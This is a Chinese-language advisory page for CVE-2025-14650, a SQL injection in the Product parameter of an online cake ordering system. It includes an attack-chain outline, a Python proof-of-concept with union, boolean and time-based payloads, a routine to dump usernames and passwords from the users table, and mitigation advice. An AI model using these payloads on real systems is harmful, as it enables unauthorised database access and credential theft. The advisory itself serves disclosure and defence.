CVE-2025-14650 | itsourcecode Online Cake Ordering System 产品参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14650

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Cake Ordering System 1.0

漏洞概述

CVE-2025-14650是itsourcecode Online Cake Ordering System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/cakeshop/product.php文件中的Product参数处理逻辑中，攻击者可以通过操纵该参数注入恶意SQL代码，从而非法访问、篡改或删除数据库中的敏感信息。该漏洞无需任何认证即可被利用，攻击复杂度低，可被远程发起，对系统机密性、完整性和可用性均造成较低程度的影响。CVSS评分7.3，属于高危漏洞。攻击者利用该漏洞可获取用户订单信息、个人数据、管理员凭据等敏感数据，甚至可能在某些配置下执行系统命令或完全控制数据库服务器。该漏洞的利用代码已在互联网上公开披露，构成了严重的安全威胁。建议受影响的用户立即采取修复措施，使用参数化查询替代动态SQL语句，并对系统进行全面安全审计。

技术细节

该SQL注入漏洞源于itsourcecode Online Cake Ordering System 1.0在处理用户输入时未对Product参数进行充分的输入验证和SQL语句预编译。攻击者可通过在/cakeshop/product.php页面的Product参数中注入SQL语句片段，如使用UNION SELECT、布尔盲注、时间盲注或堆叠查询等技术，绕过应用层的简单过滤机制，直接与后端数据库交互。漏洞利用的典型方式包括：1) 使用UNION语句联合查询获取数据库版本、当前用户、表结构等元数据；2) 通过条件判断语句进行布尔盲注，逐字符猜测敏感数据；3) 利用SLEEP()或BENCHMARK()等函数进行基于时间延迟的盲注攻击；4) 使用INSERT/UPDATE/DELETE语句篡改或删除数据。由于该参数直接拼接到SQL查询语句中且缺乏参数化处理，攻击者可在未经身份验证的情况下远程利用此漏洞，成功率较高。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统为itsourcecode Online Cake Ordering System 1.0，并确认/cakeshop/product.php端点存在

STEP 2

步骤2

漏洞探测：攻击者向Product参数发送单引号(')等特殊字符，观察返回的SQL错误信息，确认是否存在SQL注入漏洞

STEP 3

步骤3

指纹识别：利用UNION SELECT NULL,version(),user(),database()等语句获取数据库类型、版本、当前用户和数据库名称等关键信息

STEP 4

步骤4

数据枚举：通过information_schema或系统表查询获取数据库表结构，包括表名、列名等元数据信息

STEP 5

步骤5

敏感数据提取：构造恶意SQL查询语句提取用户表中的用户名、密码哈希、邮箱等敏感信息

STEP 6

步骤6

权限提升：利用获取的凭据尝试登录管理员后台，或通过SQL注入获取的管理员权限进一步控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14650 PoC - SQL Injection in Online Cake Ordering System
# Target: itsourcecode Online Cake Ordering System 1.0
# Endpoint: /cakeshop/product.php
# Parameter: Product (vulnerable to SQL injection)

def test_sql_injection(target_url):
    """Test for SQL injection vulnerability in Product parameter"""
    
    # Basic injection test - single quote to trigger SQL error
    payload_basic = "'"
    
    # Union-based injection to extract database version
    payload_union = "' UNION SELECT NULL,version(),user(),database(),NULL-- -"
    
    # Boolean-based blind injection to extract table names
    payload_boolean = "' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)='1"
    
    # Time-based blind injection
    payload_time = "' AND SLEEP(5)-- -"
    
    print(f"[*] Testing SQL Injection on {target_url}")
    print(f"[*] Target endpoint: /cakeshop/product.php")
    print(f"[*] Vulnerable parameter: Product")
    
    test_cases = [
        ("Basic injection", payload_basic),
        ("Union-based injection", payload_union),
        ("Boolean-based injection", payload_boolean),
        ("Time-based injection", payload_time)
    ]
    
    for test_name, payload in test_cases:
        try:
            params = {"Product": payload}
            response = requests.get(target_url, params=params, timeout=10)
            
            if "sql" in response.text.lower() or "error" in response.text.lower() or response.status_code >= 500:
                print(f"[+] {test_name}: VULNERABLE - SQL error detected")
            else:
                print(f"[-] {test_name}: Not directly vulnerable")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Error during {test_name}: {e}")

def extract_data(target_url):
    """Extract sensitive data using union-based injection"""
    
    # Payload to extract users table data
    union_payload = "' UNION SELECT 1,username,password,email,4 FROM users-- -"
    
    print(f"[*] Attempting to extract user credentials...")
    params = {"Product": union_payload}
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Response received - check for leaked credentials")
            print(f"[+] Response length: {len(response.text)} bytes")
    except requests.exceptions.RequestException as e:
        print(f"[!] Extraction failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_14650_poc.py <target_url>")
        print("Example: python cve_2025_14650_poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    test_sql_injection(target)
    extract_data(target)
    print("\n[*] PoC execution completed")

影响范围

itsourcecode Online Cake Ordering System 1.0

防御指南

临时缓解措施

在正式补丁发布前，可采取以下临时缓解措施：1) 在Web应用防火墙中配置规则，拦截包含SQL注入特征的请求，如单引号、UNION、SELECT等关键字；2) 临时禁用或限制/cakeshop/product.php页面的访问；3) 为数据库账户移除不必要的权限，限制DROP、DELETE等危险操作；4) 实施IP白名单访问控制，限制只有可信IP可访问管理后台；5) 开启数据库审计日志，实时监控异常SQL查询行为；6) 建议用户立即修改可能泄露的管理员密码，并启用双因素认证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14650
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14650
3 Details https://www.cvedetails.com/cve/CVE-2025-14650/
4 VulDB https://vuldb.com/cve/CVE-2025-14650
5 Link https://github.com/yihaofuweng/cve/issues/61
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.336383
8 Link https://vuldb.com/?id.336383
9 Link https://vuldb.com/?submit.710248